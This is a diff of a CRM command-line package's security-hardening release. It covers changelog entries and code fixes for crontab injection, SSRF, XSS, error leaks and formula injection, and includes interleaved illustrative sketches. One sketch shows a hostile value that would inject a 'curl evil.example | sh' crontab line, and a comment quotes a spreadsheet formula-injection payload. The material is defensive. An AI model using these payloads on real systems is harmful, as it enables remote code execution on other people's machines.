fullstackgtm 0.25.0 → 0.25.2

package/CHANGELOG.md CHANGED
@@ -5,6 +5,68 @@ The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
5
5
  and the project adheres to [Semantic Versioning](https://semver.org/).
6
6
  The path to 1.0 is planned in [docs/roadmap-to-1.0.md](./docs/roadmap-to-1.0.md).
7
7
 
8
+ ## [0.25.2] — 2026-06-15
9
+
10
+ Security hardening I — confirmed fixes from an adversarial audit (each verified
11
+ by a refute-by-default re-attack; the crontab and report fixes took three
12
+ rounds because the re-attack kept finding deeper paths).
13
+
14
+ ### Security
15
+
16
+ - **Crontab injection via `schedule install` (was: arbitrary code execution).**
17
+ `schedule add --label` rejects newlines/control chars; `renderManagedBlock`
18
+ now refuses to render any entry (or CLI invocation) whose interpolated
19
+ fields — label, cron, id, profile, argv, **and the resolved node/script
20
+ path + `FSGTM_HOME`** — carry a control character, so a hand-edited
21
+ `schedules.json` or a newline in `FSGTM_HOME` can no longer inject a live
22
+ crontab line. `parseCron` now accepts ASCII space/tab only (rejects Unicode
23
+ whitespace), and a stray `%` in a path is escaped (`\%`) so it can't truncate
24
+ the managed line.
25
+ - **SSRF in `market capture`.** Page fetches now allow only http/https, refuse
26
+ any host that is or resolves to a private/loopback/link-local/CGNAT/metadata
27
+ address (IPv4, IPv6, and IPv4-mapped IPv6 in dotted or hex form), follow
28
+ redirects manually with per-hop re-validation, and cap time/body size.
29
+ - **Stored XSS in the market HTML report.** The embedded JSON data island is
30
+ serialized with `<`/`>`/`&`/U+2028/U+2029 escaped (no `</script>` breakout),
31
+ the tooltip is built with `textContent` (no `innerHTML`), and the two
32
+ remaining raw sinks (anchor vendor name, evidence-appendix confidence) are
33
+ now `escapeHtml`'d; `validateObservationSet` rejects a non-enum `confidence`
34
+ so an `observe --from` file can't smuggle markup.
35
+ - **Provider response bodies no longer leak into errors.** HubSpot, Salesforce,
36
+ Apollo, and Stripe connectors throw status-line-only errors (a 4xx body can
37
+ echo submitted emails/domains or the key, and these errors are persisted into
38
+ scheduled-run records).
39
+ - **CSV/formula injection neutralized at the enrich write path.** Ingested
40
+ string values beginning with `= + - @` / tab / CR are prefixed with `'` so
41
+ they can't execute if the CRM is later exported to a spreadsheet; numeric
42
+ values keep full fidelity.
43
+ - **Credential-store mode enforced on read, not just write.** A pre-existing
44
+ `credentials.json` with group/other permissions is re-tightened to 0600 (and
45
+ warned) on read, closing the inherited-loose-permissions gap.
46
+
47
+ Known residuals tracked for follow-up: `marketMapToMarkdown` does not
48
+ HTML-escape (safe in terminals/GitHub; only a risk if a downstream renderer
49
+ trusts raw HTML — to be addressed with the report work); the credential read
50
+ check is reactive (a loose file is exposed until the next CLI read).
51
+
52
+ ## [0.25.1] — 2026-06-12
53
+
54
+ Docs-sync release — no code changes.
55
+
56
+ ### Fixed
57
+
58
+ - README, INSTALL_FOR_AGENTS.md, the agent skill, and docs/api.md corrected
59
+ against the shipped surface: the MCP tool list now enumerates all 8 tools
60
+ (read-only vs gated), the builtin rule count is 12, docs/api.md gains a
61
+ Schedule section and the `schedule` command in its CLI list, the README
62
+ cites the 612-run CRM-ops benchmark and the `diff --fail-on-new-findings`
63
+ CI gate, the bulk-update section covers `!~` / `--create-task` /
64
+ `--force-archive-duplicates`, and the skill's verb map completes the
65
+ `schedule`, `market`, and `plans` rows and adds `report`.
66
+ - The 0.23.0 entry below is amended retroactively: `dedupe`, `reassign`,
67
+ `fix`, and `--set <field>=from:<sourceField>` shipped in 0.23.0 without a
68
+ changelog record.
69
+
8
70
  ## [0.25.0] — 2026-06-12
9
71
 
10
72
  ### Added
@@ -136,6 +198,29 @@ everything that shipped 0.19–0.23. (No code changes.)
136
198
  - Every `enrich` subcommand catches `--help`/`-h` before config load,
137
199
  credential resolution, or any network call. No scheduling/cron logic —
138
200
  that is the horizontal schedule layer's job (docs/schedule.md).
201
+ - **Four task-shaped verbs** (entry added retroactively — these shipped in
202
+ 0.23.0 without a changelog record). The 612-run benchmark's gated-agent
203
+ failures clustered into four missing verbs; all four compile to plans
204
+ through the existing plan → approve → apply gate — nothing writes directly.
205
+ - `dedupe <account|contact|deal> --key <domain|email|name>` — duplicate
206
+ groups by normalized identity key, one `merge_records` operation per
207
+ group with a deterministic survivor (`richest` = most populated data
208
+ fields, ties to lowest id; `oldest` = lowest id). High risk, approval
209
+ required; merges are irreversible on apply.
210
+ - `reassign --from <ownerId> --to <ownerId>` — the ownership-handoff
211
+ playbook: one bulk-update-style plan per object type, extra `--where`
212
+ scoping account-lifted for deals/contacts, `--except-deal-stage`
213
+ excluding the stage AND records whose account has an open deal in it —
214
+ re-verified per record at apply time.
215
+ - `fix --rule <id>` — one-shot composite: audit one rule → save → suggest
216
+ → approve only suggestion-backed values at the confidence bar → apply
217
+ (`--yes` required), with a stage-by-stage summary.
218
+ - `bulk-update --set <field>=from:<sourceField>` — per-record derived
219
+ values resolved from the filter view (relational sources like
220
+ `account.ownerId` included); empty-source records are skipped and
221
+ counted, never guessed. Plus the `--archive` duplicate guard: archiving
222
+ a record that shares its identity key with another is refused and
223
+ pointed at `dedupe`, overridable with `--force-archive-duplicates`.
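The survivor rule described for `dedupe` can be illustrated with a minimal sketch. The record shape (`id`, `fields`), the `pickSurvivor` and `populatedCount` names, and the numeric comparison of ids are assumptions made for illustration only; the package's `buildDedupePlan` is not shown in this diff and may work differently.

```javascript
// Hypothetical sketch of a deterministic merge survivor, not the package's code.
// Assumes each record looks like { id: "123", fields: { name: "Acme", ... } }
// and that ids can be compared numerically.

function populatedCount(record) {
  // Count fields that hold a non-empty value.
  return Object.values(record.fields).filter(
    (v) => v !== null && v !== undefined && v !== ""
  ).length;
}

function pickSurvivor(group, strategy) {
  const byLowestId = (a, b) => Number(a.id) - Number(b.id);
  if (strategy === "oldest") {
    return [...group].sort(byLowestId)[0];
  }
  // "richest": most populated fields first, ties broken by lowest id.
  return [...group].sort(
    (a, b) => populatedCount(b) - populatedCount(a) || byLowestId(a, b)
  )[0];
}

const group = [
  { id: "30", fields: { name: "Acme", domain: "acme.com", phone: "" } },
  { id: "12", fields: { name: "Acme", domain: null, phone: null } },
  { id: "21", fields: { name: "Acme Inc", domain: "acme.com", phone: null } },
];

console.log(pickSurvivor(group, "richest").id); // 21 (ties with 30, lower id wins)
console.log(pickSurvivor(group, "oldest").id);  // 12
```

Because the sort key never depends on input order, two runs over the same group pick the same survivor, which is what lets the resulting `merge_records` operation be reviewed and approved by id.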
139
224
 
140
225
  ## [0.22.0] — 2026-06-12
141
226
 
@@ -3,6 +3,10 @@
3
3
  Deterministic install-and-verify steps. Every command is non-interactive, every
4
4
  check has an expected output, and nothing here writes to a CRM.
5
5
 
6
+ If your harness supports agent skills, `npx skills add fullstackgtm/core`
7
+ installs the compact operating guide; this document remains the deterministic
8
+ install-and-verify path.
9
+
6
10
  ## 1. Install
7
11
 
8
12
  ```bash
@@ -60,6 +64,11 @@ page texts — every span is checked character-for-character against the stored
60
64
  capture, and paraphrased quotes are rejected. In non-interactive contexts the
61
65
  CLI never prompts — it fails with this guidance.
62
66
 
67
+ Apollo enrichment (`enrich append --source apollo`) needs `APOLLO_API_KEY` in
68
+ the environment, or have the human run `echo "$KEY" | fullstackgtm login apollo`
69
+ once. Without it, `enrich ingest <file> --source clay` still stages push-style
70
+ data keyless.
71
+
63
72
  Provider prerequisites (what the human must create, and which scopes) are in
64
73
  the README's **"Connect your CRM"** section: HubSpot needs a private app with
65
74
  four `crm.objects.*.read` scopes (plus write scopes only for `apply`);
@@ -111,8 +120,12 @@ If the working directory's project already has the peers in its node_modules,
111
120
  the server resolves them from there (peer-dependency semantics) — so this
112
121
  works from inside existing projects too.
113
122
 
114
- Tools exposed over stdio: `fullstackgtm_audit` (read-only),
115
- `fullstackgtm_rules`, `fullstackgtm_apply` (requires `approvedOperationIds`).
123
+ Tools exposed over stdio read-only: `fullstackgtm_audit`,
124
+ `fullstackgtm_rules`, `fullstackgtm_suggest`, `fullstackgtm_call_parse`,
125
+ `fullstackgtm_resolve`, `fullstackgtm_market_worksheet`. Gated:
126
+ `fullstackgtm_apply` (requires explicit `approvedOperationIds`),
127
+ `fullstackgtm_market_observe` (every quoted span is verified against the
128
+ stored captures before anything is appended).
116
129
 
117
130
  ## Troubleshooting
118
131
 
package/README.md CHANGED
@@ -127,7 +127,7 @@ fullstackgtm reassign --from 411 --to 902 --except-deal-stage closing --save #
127
127
  fullstackgtm fix --rule missing-deal-owner --provider hubspot --yes # audit one rule → suggest → approve → apply, one command
128
128
  ```
129
129
 
130
- `bulk-update` filters the snapshot (`=`, `!=`, `~` substring, `:empty`/`:notempty`, `|` any-of, relational pseudo-fields like `account.domain` or `openDealStages`) into a dry-run patch plan — and **the full filter is re-verified per record at apply time**, with mid-apply rechecks, so a record that stopped matching between audit and apply is skipped, not clobbered. Equality filters double as preconditions; `--require` adds explicit ones; `--guard` asserts cross-record conditions; `--max-operations` caps blast radius. `--set field=from:<sourceField>` derives values per record; `--archive` refuses records whose identity key (account domain, contact email) is shared with another record — that's a duplicate, and duplicates are merged with `dedupe`, not archived around.
130
+ `bulk-update` filters the snapshot (`=`, `!=`, `~` substring, `!~` not-substring, `:empty`/`:notempty`, `|` any-of, relational pseudo-fields like `account.domain` or `openDealStages`) into a dry-run patch plan — and **the full filter is re-verified per record at apply time**, with mid-apply rechecks, so a record that stopped matching between audit and apply is skipped, not clobbered. Equality filters double as preconditions; `--require` adds explicit ones; `--guard` asserts cross-record conditions; `--max-operations` caps blast radius. `--set field=from:<sourceField>` derives values per record; `--create-task <text>` is the third change mode, emitting approval-gated `create_task` operations instead of field writes; `--archive` refuses records whose identity key (account domain, contact email) is shared with another record — that's a duplicate, and duplicates are merged with `dedupe`, not archived around (`--force-archive-duplicates` overrides that refusal explicitly).
131
131
 
132
132
  `dedupe` finds duplicate groups by normalized identity key and emits one `merge_records` operation per group with a deterministic survivor (`richest` = most populated fields, ties to lowest id; `oldest`). Merges stay irreversible-and-therefore-low-confidence-capped on approval, exactly like merge suggestions from the audit. `reassign` is the ownership-handoff playbook: one plan per object type, extra scoping account-lifted to deals and contacts, and `--except-deal-stage` excludes both deals in that stage and every record whose account has an open deal in it. `fix` is the one-shot composite for a single rule: audit → save → suggest → approve suggestion-backed operations at the confidence bar → with `--yes`, apply and print the stage-by-stage summary; without it, stop after approval and print the apply command.
133
133
 
@@ -210,12 +210,17 @@ fullstackgtm audit --input snap.json --rules stale-deal --stale-days 45 --json
210
210
 
211
211
  # Gate a nightly CI job or agent run on hygiene: exit 2 if findings ≥ threshold
212
212
  fullstackgtm audit --provider hubspot --fail-on warning
213
+
214
+ # Gate CI on hygiene drift instead: exit 2 only when a NEW (rule, record) finding appears
215
+ fullstackgtm diff --before old.json --after new.json --fail-on-new-findings
213
216
  ```
214
217
 
215
218
  - Finding and operation ids are **stable hashes** of rule + record, so two runs over the same data produce identical ids — agents can diff plans, track findings across runs, and approve operations by id without re-parsing.
216
219
  - `--demo` (with `--seed`) generates a realistic mid-market CRM with injected real-world failure modes — departed owners, unlinked deals, orphan accounts, stale pipeline — so agents and CI can exercise the full snapshot → audit → apply pipeline with zero credentials.
217
220
  - Exit codes: `0` success, `1` error, `2` findings at/above `--fail-on`.
218
221
 
222
+ "Built for agents" is measured, not asserted: a 612-run benchmark (17 scenarios × 3 tool-surface arms × 4 trials, deterministic graders over final CRM state, τ-bench-style pass^k) shows the gated CLI surface beating raw CRM-API access on completion-under-policy for every model tested. Full matrix and methodology: [the leaderboard](./evals/crm/leaderboard/RESULTS.md).
223
+
219
224
  ## Authentication: CLI-first, browser only at the consent moment
220
225
 
221
226
  Credential resolution is a ladder — the first rung that yields a token wins:
@@ -297,7 +302,7 @@ The Stripe connector only reads customers and subscriptions, and `apply` is read
297
302
  | Concept | What it is |
298
303
  |---|---|
299
304
  | **Canonical snapshot** | Provider-independent view of users, accounts, contacts, deals, activities. Records carry `identities` — `(provider, externalId)` claims — so the same real-world entity can be tracked across several systems. |
300
- | **Audit rule** | A deterministic function `(context) => { findings, operations }`. Eleven built-ins cover orphan accounts, ownerless/unlinked/amount-less deals, past close dates, stale pipeline, duplicates, and more — `fullstackgtm rules` lists them all. Write your own in ~10 lines. |
305
+ | **Audit rule** | A deterministic function `(context) => { findings, operations }`. Twelve built-ins cover orphan accounts, ownerless/unlinked/amount-less deals, past close dates, stale pipeline, duplicates, and more — `fullstackgtm rules` lists them all. Write your own in ~10 lines. |
301
306
  | **Patch plan** | The dry-run output of an audit: findings plus typed patch operations with before/after values, reasons, risk levels, and approval flags. Always a proposal, never a mutation. |
302
307
  | **Connector** | A provider adapter: `fetchSnapshot()` for reads, optional `applyOperation()` for writes. HubSpot and Salesforce reference connectors ship in the package; connectors never drop records they can't fully resolve — the audit flags them instead. |
303
308
  | **Patch plan run** | The audit record of one apply attempt: per-operation applied/failed/skipped results. |
@@ -396,7 +401,13 @@ Or configure any MCP client (Cursor, Claude Desktop, …) with:
396
401
  }
397
402
  ```
398
403
 
399
- Exposes `fullstackgtm_audit` (read-only; sample, demo, file, or live provider sources with optional rule scoping), `fullstackgtm_rules` (rule discovery), and `fullstackgtm_apply` (requires explicit `approvedOperationIds`) over stdio. Tokens stored via `fullstackgtm login` are picked up automatically — the env var is only needed when no stored login exists.
404
+ Eight tools are exposed over stdio.
405
+
406
+ **Read-only:** `fullstackgtm_audit` (sample, demo, file, or live provider sources with optional rule scoping), `fullstackgtm_rules` (rule discovery), `fullstackgtm_suggest` (deterministic placeholder values with confidence + reasons), `fullstackgtm_call_parse` (transcripts → provenance-marked segments, insights, and evidence), `fullstackgtm_resolve` (the create gate: exists / ambiguous / safe_to_create), and `fullstackgtm_market_worksheet` (the classification packet for one vendor: claims, judging rules, captured page texts).
407
+
408
+ **Gated:** `fullstackgtm_apply` (requires explicit `approvedOperationIds`; placeholders still need value overrides) and `fullstackgtm_market_observe` (verifies every quoted span against the stored captures before appending — nothing is stored unless the whole set passes).
409
+
410
+ Tokens stored via `fullstackgtm login` are picked up automatically — the env var is only needed when no stored login exists.
400
411
 
401
412
  ## Safety model
402
413
 
package/dist/cli.js CHANGED
@@ -27,7 +27,7 @@ import { marketMapToHtml, marketMapToMarkdown } from "./marketReport.js";
27
27
  import { DEFAULT_RUBRIC, detectProviderFromKey, extractInsightsLlm, parseRubric, resolveLlmCredential, scoreCallLlm, validateLlmKey, } from "./llm.js";
28
28
  import { buildEnrichPlan, createFileEnrichRunStore, DEFAULT_STALE_DAYS, ENRICH_CONFIG_FILE_NAME, enrichRunId, inferIngestObjectType, latestStamps, loadEnrichConfig, parseCsv, resolveCrmField, selectStaleWork, stagedSourceRecords, staleDaysFor, } from "./enrich.js";
29
29
  import { apolloPullKeysForAppend, apolloPullKeysForRefresh, createApolloClient, pullApolloRecords, } from "./enrichApollo.js";
30
- import { computeMissedFirings, createFileScheduleRunStore, createFileScheduleStore, nextCronFiring, parseCron, renderManagedBlock, replaceManagedBlock, scheduleId, systemCrontabIo, tokenizeCommand, validateSchedulableArgv, } from "./schedule.js";
30
+ import { computeMissedFirings, createFileScheduleRunStore, createFileScheduleStore, nextCronFiring, parseCron, renderManagedBlock, replaceManagedBlock, assertSingleLineLabel, hasControlChar, scheduleId, systemCrontabIo, tokenizeCommand, validateSchedulableArgv, } from "./schedule.js";
31
31
  import { resolveRecord } from "./resolve.js";
32
32
  import { buildBulkUpdatePlan } from "./bulkUpdate.js";
33
33
  import { buildDedupePlan } from "./dedupe.js";
@@ -1614,6 +1614,7 @@ trigger: manual. status shows next firing and surfaces missed firings
1614
1614
  const createdAt = new Date().toISOString();
1615
1615
  const label = option(rest, "--label") ??
1616
1616
  argv.filter((arg) => !arg.startsWith("--")).slice(0, 2).join("-").replace(/[^\w.-]+/g, "-");
1617
+ assertSingleLineLabel(label);
1617
1618
  const entry = {
1618
1619
  id: scheduleId(label, cron.source, argv, createdAt),
1619
1620
  label,
@@ -1819,13 +1820,27 @@ function scheduleCliInvocation() {
1819
1820
  if (!script || !existsSync(script)) {
1820
1821
  throw new Error("Cannot resolve the fullstackgtm entry point for crontab lines (process.argv[1] is missing).");
1821
1822
  }
1823
+ // A newline/control char in any of these flows verbatim into the crontab
1824
+ // executable line; single-quote escaping defends the shell, not cron's line
1825
+ // parser. Refuse early with a clear message (renderManagedBlock re-checks).
1826
+ for (const [name, value] of [
1827
+ ["FSGTM_HOME", process.env.FSGTM_HOME],
1828
+ ["the node executable path", process.execPath],
1829
+ ["the CLI script path", script],
1830
+ ]) {
1831
+ if (value && hasControlChar(value)) {
1832
+ throw new Error(`Cannot install schedules: ${name} contains a newline or control character.`);
1833
+ }
1834
+ }
1822
1835
  const quote = (value) => `'${value.replace(/'/g, `'\\''`)}'`;
1823
1836
  const parts = [quote(process.execPath)];
1824
1837
  if (script.endsWith(".ts"))
1825
1838
  parts.push("--experimental-strip-types");
1826
1839
  parts.push(quote(script));
1827
1840
  const home = process.env.FSGTM_HOME ? `FSGTM_HOME=${quote(process.env.FSGTM_HOME)} ` : "";
1828
- return home + parts.join(" ");
1841
+ // cron treats an unescaped `%` in the command field as a newline/stdin split.
1842
+ // Escape it as `\%` so a stray `%` in a path can't truncate the managed line.
1843
+ return (home + parts.join(" ")).replace(/%/g, "\\%");
1829
1844
  }
1830
1845
  /**
1831
1846
  * The single provider entry point: execute the scheduled command in-process
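The comments in this hunk make two points: shell quoting does not stop a newline from starting a new crontab line, and cron treats an unescaped `%` as a line break. A minimal sketch of both follows. The body of `hasControlChar` and the helper name `escapeCronPercent` are assumptions; the package's `schedule.js` is not shown in this diff, and its real check may cover a different character set.

```javascript
// Hypothetical sketch; the real hasControlChar lives in schedule.js (not shown).
// Here it treats C0 controls (including \n, \r, \t) and DEL as control characters.
function hasControlChar(value) {
  return /[\u0000-\u001f\u007f]/.test(value);
}

// Single-quote a value for the shell, as scheduleCliInvocation does.
const quote = (value) => `'${value.replace(/'/g, `'\\''`)}'`;

// cron treats an unescaped % in the command field as a newline, so escape it.
function escapeCronPercent(command) {
  return command.replace(/%/g, "\\%");
}

// A hostile FSGTM_HOME: quoting keeps the shell safe, but the newline survives,
// and cron would read the second line as its own entry.
const hostileHome = "/tmp/x\n* * * * * curl evil.example | sh";
const quotedHome = quote(hostileHome);

console.log(quotedHome.includes("\n"));                // true
console.log(hasControlChar(hostileHome));              // true
console.log(hasControlChar("/home/me/.fsgtm"));        // false
console.log(escapeCronPercent(quote("/opt/50%/node"))); // '/opt/50\%/node'
```

Rejecting the value outright, rather than trying to strip or encode the control character, keeps the rendered crontab line a faithful copy of what the operator configured.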
@@ -44,8 +44,11 @@ export function createHubspotConnector(options) {
44
44
  throw new Error(`Cannot reach HubSpot at ${baseUrl}${cause}. Check network access.`);
45
45
  }
46
46
  if (!response.ok) {
47
- const body = await response.text();
48
- throw new Error(`HubSpot API error ${response.status}: ${body}`);
47
+ // Status line only — HubSpot 4xx bodies echo submitted property values
48
+ // (contact emails, company domains) and the request payload, and these
49
+ // errors are persisted into scheduled-run records. Never interpolate it.
50
+ await response.text().catch(() => undefined);
51
+ throw new Error(`HubSpot API error ${response.status}. Check the token scopes and request.`);
49
52
  }
50
53
  // DELETE and some association writes return 204 with an empty body.
51
54
  const text = await response.text();
@@ -46,8 +46,10 @@ export function createSalesforceConnector(options) {
46
46
  throw new Error(`Cannot reach Salesforce at ${connection.instanceUrl}${cause}. Check SALESFORCE_INSTANCE_URL (your My Domain URL, e.g. https://yourco.my.salesforce.com) and network access.`);
47
47
  }
48
48
  if (!response.ok) {
49
- const body = await response.text();
50
- throw new Error(`Salesforce API error ${response.status}: ${body}`);
49
+ // Status line only — the body echoes submitted field values and the
50
+ // request, and these errors are persisted into scheduled-run records.
51
+ await response.text().catch(() => undefined);
52
+ throw new Error(`Salesforce API error ${response.status}. Check the token and request.`);
51
53
  }
52
54
  // Salesforce PATCH returns 204 No Content on success.
53
55
  const text = await response.text();
@@ -26,8 +26,10 @@ export function createStripeConnector(options) {
26
26
  headers: { Authorization: `Bearer ${apiKey}` },
27
27
  });
28
28
  if (!response.ok) {
29
- const body = await response.text();
30
- throw new Error(`Stripe API error ${response.status}: ${body}`);
29
+ // Status line only — the body can echo request details bound to a live
30
+ // billing key, and these errors land in scheduled-run records.
31
+ await response.text().catch(() => undefined);
32
+ throw new Error(`Stripe API error ${response.status}. Check the restricted key and request.`);
31
33
  }
32
34
  return response.json();
33
35
  }
@@ -1,4 +1,4 @@
1
- import { chmodSync, existsSync, mkdirSync, readdirSync, readFileSync, unlinkSync, writeFileSync, } from "node:fs";
1
+ import { chmodSync, existsSync, mkdirSync, readdirSync, readFileSync, statSync, unlinkSync, writeFileSync, } from "node:fs";
2
2
  import { homedir } from "node:os";
3
3
  import { join } from "node:path";
4
4
  import { refreshHubspotToken } from "./connectors/hubspotAuth.js";
@@ -98,8 +98,29 @@ export function writeSecureFile(path, contents) {
98
98
  // Non-POSIX filesystems ignore chmod.
99
99
  }
100
100
  }
101
+ /**
102
+ * The 0600/0700 guarantee was write-only: a credentials.json inherited at
103
+ * looser permissions (a restored backup, a file created by another tool, a
104
+ * cloned home) was read and trusted regardless of its actual mode. Enforce the
105
+ * mode on read too — re-tighten to 0600 and warn once — so a world-readable
106
+ * credential store can't sit there silently leaking the token to other users.
107
+ */
108
+ function enforceCredentialFileMode(path) {
109
+ try {
110
+ const mode = statSync(path).mode & 0o777;
111
+ if ((mode & 0o077) !== 0) {
112
+ chmodSync(path, 0o600);
113
+ console.error(`fullstackgtm: tightened ${path} from ${mode.toString(8).padStart(3, "0")} to 600 ` +
114
+ "(it was readable or writable by other users).");
115
+ }
116
+ }
117
+ catch {
118
+ // Missing file or non-POSIX filesystem: nothing to enforce.
119
+ }
120
+ }
101
121
  function readFile() {
102
122
  try {
123
+ enforceCredentialFileMode(credentialsPath());
103
124
  const parsed = JSON.parse(readFileSync(credentialsPath(), "utf8"));
104
125
  if (parsed && typeof parsed === "object" && parsed.version === 1 && parsed.providers) {
105
126
  return parsed;
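The permission test in `enforceCredentialFileMode` is a bit mask: `0o077` selects the group and other permission bits, so any nonzero result means someone besides the owner has access. A small worked example, where `isLooseMode` and `fmt` are hypothetical helper names used only for illustration:

```javascript
// Hypothetical helper mirroring the (mode & 0o077) !== 0 test above.
function isLooseMode(mode) {
  const perms = mode & 0o777;   // keep only the permission bits
  return (perms & 0o077) !== 0; // is any group/other bit set?
}

// Format the mode the way the warning message does: zero-padded octal.
const fmt = (mode) => (mode & 0o777).toString(8).padStart(3, "0");

// st_mode values for regular files carry the file-type bits (0o100000) too.
console.log(fmt(0o100644), isLooseMode(0o100644)); // 644 true
console.log(fmt(0o100600), isLooseMode(0o100600)); // 600 false
console.log(fmt(0o100640), isLooseMode(0o100640)); // 640 true
```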
package/dist/enrich.js CHANGED
@@ -291,6 +291,28 @@ function valueToString(value) {
291
291
  return String(value);
292
292
  return "";
293
293
  }
294
+ /**
295
+ * CSV/formula-injection neutralization for string values destined for a CRM
296
+ * write. Third-party export rows (Clay CSV, webhook JSON) can contain cells
297
+ * like `=cmd|'/c calc'!A1` or `@SUM(...)`; written verbatim to a CRM field they
298
+ * lie dormant until someone exports the CRM to CSV and opens it in a spreadsheet,
299
+ * where the leading `= + - @` (or a leading tab/CR) makes the client execute it.
300
+ * We prefix a single apostrophe — the spreadsheet-standard escape that renders
301
+ * the cell as literal text. Numeric values bypass this (they're written as
302
+ * numbers, not strings), so signed numbers keep full fidelity; a phone number
303
+ * supplied as a string and starting with `+` gains a leading `'`, which the
304
+ * human sees in the approved diff. Applied only at the write path, never to
305
+ * match keys.
306
+ */
307
+ function neutralizeFormulaInjection(value) {
308
+ if (value && /^[=+\-@\t\r]/.test(value))
309
+ return `'${value}`;
310
+ return value;
311
+ }
312
+ /** valueToString for a value that will be written to a CRM field. */
313
+ function writeSafeString(value) {
314
+ return neutralizeFormulaInjection(valueToString(value));
315
+ }
294
316
  function normalizeKeyValue(key, value) {
295
317
  const text = valueToString(value).toLowerCase();
296
318
  if (!text)
@@ -498,7 +520,7 @@ export function buildEnrichPlan(options) {
498
520
  operation: "set_field",
499
521
  field: canonicalField,
500
522
  beforeValue: currentValue ?? null,
501
- afterValue: typeof sourceValue === "number" ? sourceValue : valueToString(sourceValue),
523
+ afterValue: typeof sourceValue === "number" ? sourceValue : writeSafeString(sourceValue),
502
524
  reason: `${source} ${record.objectType} "${describeSourceRecord(record)}" (matched by ` +
503
525
  `${outcome.matchedKey}) reports a changed value for ${canonicalField}.`,
504
526
  sourceRuleOrPolicy: `enrich:${source}:${canonicalField}`,
@@ -516,7 +538,7 @@ export function buildEnrichPlan(options) {
516
538
  if (!isEmptyValue(currentValue))
517
539
  continue;
518
540
  emittedForRecord = true;
519
- const afterValue = typeof sourceValue === "number" ? sourceValue : valueToString(sourceValue);
541
+ const afterValue = typeof sourceValue === "number" ? sourceValue : writeSafeString(sourceValue);
520
542
  operations.push({
521
543
  id: `op_enr_${fnv1a(`${source}:${record.objectType}:${outcome.recordId}:${canonicalField}`)}`,
522
544
  objectType: canonicalObjectType(record.objectType),
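The operation id in this hunk is a hash of source, object type, record id, and field, which is what makes ids repeat across runs over the same data. The sketch below shows how such an id could be derived. It assumes the standard 32-bit FNV-1a over UTF-16 code units with 8-digit hex output; the package's own `fnv1a` helper is not shown in this diff and may hash bytes or format its output differently. `enrichOperationId` is a hypothetical wrapper name.

```javascript
// Standard 32-bit FNV-1a, returned as 8 lowercase hex digits.
// Assumption for illustration; not the package's implementation.
function fnv1a(text) {
  let hash = 0x811c9dc5; // FNV offset basis
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193); // FNV prime, wrapped to 32 bits
  }
  return (hash >>> 0).toString(16).padStart(8, "0");
}

// Hypothetical wrapper shaped like the template string in buildEnrichPlan.
function enrichOperationId(source, objectType, recordId, field) {
  return `op_enr_${fnv1a(`${source}:${objectType}:${recordId}:${field}`)}`;
}

const first = enrichOperationId("apollo", "contact", "c_42", "title");
const second = enrichOperationId("apollo", "contact", "c_42", "title");
console.log(first === second); // true: same inputs, same id
```

Since the id depends only on its inputs and not on timestamps or run order, a plan generated tonight can be diffed against last night's, and an approval recorded by id stays valid as long as the underlying (source, record, field) tuple is unchanged.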
@@ -56,9 +56,12 @@ export function createApolloClient(options) {
56
56
  if (response.status === 404)
57
57
  return null;
58
58
  if (!response.ok) {
59
- const body = await response.text();
59
+ // Status line only — never interpolate the response body. It can echo
60
+ // the submitted query (contact emails / company domains) or the API key,
61
+ // and these errors are persisted verbatim into scheduled-run records.
62
+ await response.text().catch(() => undefined);
60
63
  const exhausted = response.status === 429 ? ` (rate limited; ${maxRetries} retries exhausted)` : "";
61
- throw new Error(`Apollo API error ${response.status}${exhausted}: ${body}`);
64
+ throw new Error(`Apollo API error ${response.status}${exhausted}. Check the API key and request.`);
62
65
  }
63
66
  const text = await response.text();
64
67
  return text ? JSON.parse(text) : null;
package/dist/market.d.ts CHANGED
@@ -153,6 +153,7 @@ export type FetchPage = (url: string) => Promise<{
153
153
  status: number;
154
154
  body: string;
155
155
  }>;
156
+ export declare function assertPublicUrl(rawUrl: string): Promise<URL>;
156
157
  export type CaptureOptions = {
157
158
  /** Directory for captures; defaults to <marketHome>/captures. */
158
159
  dir?: string;
package/dist/market.js CHANGED
@@ -1,5 +1,7 @@
1
1
  import { createHash } from "node:crypto";
2
+ import { lookup } from "node:dns/promises";
2
3
  import { existsSync, mkdirSync, readFileSync, readdirSync, writeFileSync } from "node:fs";
4
+ import { isIP } from "node:net";
3
5
  import { join } from "node:path";
4
6
  import { credentialsDir } from "./credentials.js";
5
7
  const INTENSITY_RANK = {
@@ -141,15 +143,144 @@ export function extractReadableText(html) {
141
143
  .filter(Boolean)
142
144
  .join("\n");
143
145
  }
146
+ /**
147
+ * SSRF guard. market.config.json URLs are operator-authored, but configs are
148
+ * shared/templated in consulting/team use and `market capture|refresh` is on
149
+ * the cron allowlist — an unguarded fetch is an unattended internal-network
150
+ * and cloud-metadata probe. We therefore (1) allow only http/https, (2) refuse
151
+ * any host that is or resolves to a private/loopback/link-local/metadata
152
+ * address, and (3) follow redirects manually, re-validating each hop.
153
+ *
154
+ * Residual gap (documented, not defended here): TOCTOU DNS rebinding between
155
+ * our lookup and fetch's own resolution. Out of scope for fetching public
156
+ * competitor pages; a hardened deployment should fetch through an egress proxy.
157
+ */
158
+ const MAX_REDIRECTS = 5;
159
+ const FETCH_TIMEOUT_MS = 15_000;
160
+ const MAX_BODY_BYTES = 5_000_000;
161
+ function ipv4IsPrivate(ip) {
162
+ const parts = ip.split(".").map((n) => Number(n));
163
+ if (parts.length !== 4 || parts.some((n) => !Number.isInteger(n) || n < 0 || n > 255))
164
+ return true;
165
+ const [a, b] = parts;
166
+ if (a === 0 || a === 127)
167
+ return true; // this-host, loopback
168
+ if (a === 10)
169
+ return true; // private
170
+ if (a === 172 && b >= 16 && b <= 31)
171
+ return true; // private
172
+ if (a === 192 && b === 168)
173
+ return true; // private
174
+ if (a === 169 && b === 254)
175
+ return true; // link-local incl. 169.254.169.254 metadata
176
+ if (a === 100 && b >= 64 && b <= 127)
177
+ return true; // CGNAT
178
+ if (a >= 224)
179
+ return true; // multicast / reserved
180
+ return false;
181
+ }
182
+ function ipIsPrivate(ip) {
183
+ const family = isIP(ip);
184
+ if (family === 4)
185
+ return ipv4IsPrivate(ip);
186
+ if (family === 6) {
187
+ const lower = ip.toLowerCase();
188
+ if (lower === "::1" || lower === "::")
189
+ return true; // loopback / unspecified
190
+ // IPv4-mapped (::ffff:…) — Node normalizes ::ffff:127.0.0.1 to ::ffff:7f00:1,
191
+ // so accept both the dotted and the hex-pair forms, unwrap, check the v4.
192
